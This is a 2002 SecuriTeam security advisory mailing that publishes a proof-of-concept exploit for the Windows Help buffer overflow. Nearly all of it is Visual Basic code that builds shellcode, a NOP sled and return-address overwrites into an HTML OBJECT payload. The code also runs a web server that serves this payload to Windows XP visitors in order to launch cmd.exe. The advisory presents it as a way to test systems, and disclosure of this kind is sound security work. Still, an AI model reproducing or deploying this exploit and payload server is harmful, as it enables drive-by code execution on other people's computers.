[EXPL] Windows Help Buffer Overflow PoC

From: support@securiteam.com
Date: 10/07/02


From: support@securiteam.com
To: list@securiteam.com
Date: 7 Oct 2002 08:44:06 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Windows Help Buffer Overflow PoC
------------------------------------------------------------------------

SUMMARY

As we reported in our previous article:
<http://www.securiteam.com/windowsntfocus/6X006155PU.html> Unchecked
Buffer in Windows Help Facility Could Enable Code Execution, an attacker
is able to cause the program to execute arbitrary code by supplying it
with an arbitrary long string. The following proof of concept exploit code
will create a web server that is able to serve different shellcode for the
different operating systems. This can be used to test your systems for the
mentioned vulnerability.

DETAILS

Exploit:
This exploit should start a cmd.exe on Microsoft Windows XP Kernel Version
5.1.2600.0 based on the Windows Help buffer Overflow.

The entire Visual Basic Project can be Found at:
<http://whiteroof.netfirms.com/ChmOverflow.zip>
http://whiteroof.netfirms.com/ChmOverflow.zip
 
------------------------
Module1.bas
-----------------------
Attribute VB_Name = "Module1"
Global NbSck As Integer
Global EIP As Variant
Global EBP As Variant
Global Buffer As Variant
Global ShellCodeFrst As Variant
Global ShellCode As Variant
Global Html_Page As Variant
 
Public Sub Buildin_The_BuFFer()
 
''''' buffer looks like that
'whatver.chm-Nop-ShellcodeFrst-Nop-ShellCode-Nop-Ebp-Eip
'nop are unimportant
'ShellcodeFrst does : add edi,46
' : jmp edi
'(Shellcode is at EDI)
 
'ShellCode does : Start up a cmd.exe (not remote) and crash IE
' : taken in a paper from David Litchfield
'
'This proof of concept works with
'Microsoft Windows XP Kernel Version 5.1.2600.0
 
'Affected software:
' Microsoft Windows 98
' Microsoft Windows 98 Second Edition
' Microsoft Windows Millennium Edition
' Microsoft Windows NT 4.0
' Microsoft Windows NT 4.0, Terminal Server Edition
' Microsoft Windows 2000
' Microsoft Windows XP
 
'Size of the Buffer depends on the Windows Version
'Based on the Unchecked Buffer in Windows Help
'Other cool modif of this "proof of concept" would be nice to see ;)
'sylvain.descoteaux@sympatico.ca
 
 
 
''''''''''''''''''''' FIRST SHELLCODE THAT POINT TO THE BIG SHELLCODE
''''''''''
ShellCodeFrst = Chr(131) + Chr(199) + Chr(46) + Chr(255) + Chr(231)
For i = 1 To 14
nop = nop + Chr(144)
Next i
ShellCodeFrst = "x.chm" + nop + ShellCodeFrst + nop + Chr(144)
 
''''''''''''''''''''' THE BIG SHELLCODE ''''''''''''''
nop = ""
ShellCode = ""
ShellCode = Chr(139) + Chr(236) + Chr(51) + Chr(255) + Chr(87) + Chr(131)
+ Chr(236) + Chr(4) + Chr(198) + Chr(69) + Chr(248) + Chr(99) + Chr(198) +
Chr(69) + Chr(249) + Chr(109) + Chr(198) + Chr(69) + Chr(250) + Chr(100) +
Chr(198) + Chr(69) + Chr(251) + Chr(46) + Chr(198) + Chr(69) + Chr(252) +
Chr(101) + Chr(198) + Chr(69) + Chr(253) + Chr(120) + Chr(198) + Chr(69) +
Chr(254) + Chr(101) + Chr(184) + Chr(68) + Chr(128) + Chr(194) + Chr(119)
+ Chr(80) + Chr(141) + Chr(69) + Chr(248) + Chr(80) + Chr(255) + Chr(85) +
Chr(244)
For i = 1 To 349
nop = nop + Chr(144)
Next i
ShellCode = nop + ShellCode + nop + Chr(144)
 
''''''''''''''''''' THE BUFFER '''''''''''''''''
Buffer = ShellCodeFrst + ShellCode + EBP + EIP + """>"
 
''''''''''''''''''' THE HTML PAGE WITH THE BUFFER ''''''''
Html_Page = "<OBJECT id=weurg type=""application/x-oleobject""" + vbCrLf
Html_Page = Html_Page +
"classid=""clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11""" + vbCrLf
Html_Page = Html_Page + "codebase=""file:hhctrl.ocx#Version=4,0,0,24""" +
vbCrLf
Html_Page = Html_Page + "width=80" + vbCrLf
Html_Page = Html_Page + "height=20>" + vbCrLf
Html_Page = Html_Page + "<PARAM name=""Command"" value=""Related Topics,
MENU"">" + vbCrLf
Html_Page = Html_Page + "<PARAM name=""Item1""" + vbCrLf
Html_Page = Html_Page + "value=""EN_CHANGE;c:\" + Buffer + vbCrLf
Html_Page = Html_Page + "</OBJECT>" + vbCrLf
Html_Page = Html_Page + "<script>weurg.HHclick()</script>" + vbCrLf
End Sub
------------------------- module1.bas --------------------------
 
------- FORM1.FRM -----
Private Sub Command1_Click()
NbSck = NbSck + 1
Load tcp(NbSck)
tcp(NbSck).LocalPort = Text2
tcp(NbSck).Listen
Text1 = "Listening on port " + Text2 + vbCrLf + "------------" + vbCrLf
Command1.Enabled = False
End Sub
 
Private Sub Form_Load()
NbSck = 0
End Sub
 
Private Sub tcp_ConnectionRequest(Index As Integer, ByVal requestID As
Long)
On Error Resume Next
NbSck = NbSck + 1
Load tcp(NbSck)
tcp(NbSck).Accept requestID
End Sub
 
Private Sub tcp_DataArrival(Index As Integer, ByVal bytesTotal As Long)
Dim Data As String
Dim Send_It As Boolean
 
tcp(Index).GetData Data
Text1 = Text1 + Data
 
If InStr(Text1, "indows NT 5.1") Then
    Text1 = "Client: " + tcp(Index).RemoteHostIP + vbCrLf + "Windows
Version: NT 5.1" + vbCrLf + "-----------------------------"
    EBP = Chr(19) + Chr(216) + Chr(36) + Chr(17)
    EIP = Chr(84) + Chr(200) + Chr(19) + Chr(0)
    '0x0013c854
    Buildin_The_BuFFer
    Send_It = True
End If
 
If Send_It Then
    If tcp(Index).State = 7 Then
        tcp(Index).SendData vbCrLf + "HTTP/1.1 200 OK" + vbCrLf
        tcp(Index).SendData "Content-Length: " + Str(Len(Buffer) + 10000)
& vbCrLf
        tcp(Index).SendData "Server: Evil." & vbCrLf
        tcp(Index).SendData "Date: Thu, 03 Oct 2002 17:57:10 GMT" & vbCrLf
        tcp(Index).SendData "Content-Type: text/html" & vbCrLf
        tcp(Index).SendData "Connection: Keep-Alive" + vbCrLf
        tcp(Index).SendData vbCrLf
        tcp(Index).SendData Html_Page
        Text1 = Text1 + vbCrLf + "buffer has been sent to " +
tcp(Index).RemoteHostIP + vbCrLf
        Text1 = Text1 + "Buffer Size Was: " + Str(Len(Buffer)) + " bytes."
+ vbCrLf
        Text1 = Text1 + "First ShellCode size was: " +
Str(Len(ShellCodeFrst)) + " bytes." + vbCrLf
        Text1 = Text1 + "Shellcode Size was: " + Str(Len(ShellCode)) + "
bytes." + vbCrLf
    End If
End If
 
End Sub
 
Private Sub Text1_DblClick()
Text1 = ""
End Sub
--------------------- FORM1.FRM--------------------------------

ADDITIONAL INFORMATION

The information has been provided by
<mailto:sylvain.descoteaux@sympatico.ca> Sylvain.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages